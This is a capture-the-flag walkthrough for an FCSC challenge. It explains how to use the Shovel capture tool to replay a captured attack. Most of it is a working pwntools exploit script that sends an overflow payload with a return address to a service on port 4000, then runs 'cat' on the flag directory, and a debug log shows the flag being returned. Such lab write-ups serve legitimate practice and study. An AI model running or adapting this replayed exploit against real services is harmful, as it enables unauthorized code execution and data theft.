-
Launch Docker Container
-
Open http://localhost:8000 in a browser to use Shovel
-
Click the last entry, then use the raw data window to generate a Python script and copy it into a Python file
-
Modify the entry:
r.sendline(b'cat /fcsc/EpGne4SB6vZpm5gvjNyqSbMxmmACNjf/*')
-
to our own:
r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*')
-
-
Launch the Python code (run `apt install python3-pwntools -y` first if pwntools is not installed):
#!/usr/bin/env python3
# Filename: replay-blind-4000-1524784517420974.py
import json
import os
from pwn import *
"""
This file was generated from network capture towards 10.0.2.2 (TCP).
Corresponding flow id: 1524784517420974
Service: blind-4000
"""
# Set logging level
context.log_level = "DEBUG" # or INFO, WARNING, ERROR
# Load environment variables
# EXTRA is an array of the flagids for current service and team
HOST = os.getenv("TARGET_IP")
EXTRA = json.loads(os.getenv("TARGET_EXTRA", "[]"))
# Connect to remote and run the actual exploit
# Timeout is important to prevent stall
r = remote(HOST, 4000, typ="tcp", timeout=2)
# FIXME: You should identify if a flag_id was used in the following
# payload. If it is the case, then you should loop using EXTRA.
# for flag_id in EXTRA:
data = r.recvuntil(b'e note summary.\n')
r.sendline(b'n')
data = r.recvuntil(b'vuVE8\nContent: \n')
r.sendline(b'PjiFs69P7liiKPaKS73Ym9IyPSAhw21Nd2xCCfbQSMboGcFfkYMjmY99ScBS2yjmZySDQDin64MwLI9ZhPqd1a5UZ3jpXXzv553SSHnQ7bDzLeBD5VRNMswiv36fHMu1RxkUMIRkpCqkTU2IQjZcSgF5SXOek0ifAGDXtyl1UUB34CPAqPbTq7eAtGVCoIChiYPoJJrW1JR5s6QNZWVKT7Jf5KbchBjIJjUMmbG6\xe5\x16@\x00\x00\x00\x00\x00')
r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*')
data = r.recvuntil(b'ca8f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n')
# Use the following to capture all remaining bytes:
# data = r.recvall(timeout=5)
# print(data)
r.close()
========================
root@servertest:/home/test/HACK# python3 blindspot.py
[+] Opening connection to None on port 4000: Done
[DEBUG] Received 0x25 bytes:
b'[n]ew note.\n'
b'[r]etrieve note summary.\n'
[DEBUG] Sent 0x2 bytes:
b'n\n'
[DEBUG] Received 0x5b bytes:
b'[*] Current session: /fcsc/C8bureAjatRpPbK2MBP73aM9GX3tBUM/GKQ5EmK6TF5TqbDYfqttQeAqDX6hTuQ\n'
[DEBUG] Received 0xa bytes:
b'Content: \n'
[DEBUG] Sent 0xf1 bytes:
00000000 50 6a 69 46 73 36 39 50 37 6c 69 69 4b 50 61 4b │PjiF│s69P│7lii│KPaK│
00000010 53 37 33 59 6d 39 49 79 50 53 41 68 77 32 31 4e │S73Y│m9Iy│PSAh│w21N│
00000020 64 32 78 43 43 66 62 51 53 4d 62 6f 47 63 46 66 │d2xC│CfbQ│SMbo│GcFf│
00000030 6b 59 4d 6a 6d 59 39 39 53 63 42 53 32 79 6a 6d │kYMj│mY99│ScBS│2yjm│
00000040 5a 79 53 44 51 44 69 6e 36 34 4d 77 4c 49 39 5a │ZySD│QDin│64Mw│LI9Z│
00000050 68 50 71 64 31 61 35 55 5a 33 6a 70 58 58 7a 76 │hPqd│1a5U│Z3jp│XXzv│
00000060 35 35 33 53 53 48 6e 51 37 62 44 7a 4c 65 42 44 │553S│SHnQ│7bDz│LeBD│
00000070 35 56 52 4e 4d 73 77 69 76 33 36 66 48 4d 75 31 │5VRN│Mswi│v36f│HMu1│
00000080 52 78 6b 55 4d 49 52 6b 70 43 71 6b 54 55 32 49 │RxkU│MIRk│pCqk│TU2I│
00000090 51 6a 5a 63 53 67 46 35 53 58 4f 65 6b 30 69 66 │QjZc│SgF5│SXOe│k0if│
000000a0 41 47 44 58 74 79 6c 31 55 55 42 33 34 43 50 41 │AGDX│tyl1│UUB3│4CPA│
000000b0 71 50 62 54 71 37 65 41 74 47 56 43 6f 49 43 68 │qPbT│q7eA│tGVC│oICh│
000000c0 69 59 50 6f 4a 4a 72 57 31 4a 52 35 73 36 51 4e │iYPo│JJrW│1JR5│s6QN│
000000d0 5a 57 56 4b 54 37 4a 66 35 4b 62 63 68 42 6a 49 │ZWVK│T7Jf│5Kbc│hBjI│
000000e0 4a 6a 55 4d 6d 62 47 36 e5 16 40 00 00 00 00 00 │JjUM│mbG6│··@·│····│
000000f0 0a │·│
000000f1
[DEBUG] Sent 0x2c bytes:
b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*\n'
[DEBUG] Received 0x46 bytes:
b'FCSC_47d5ba1574be11ecbbfdcfac58fa8e8dcc8f010894f79b8615e4d746bc857d80\n'
[*] Closed connection to None port 4000
Copy and submit the flag.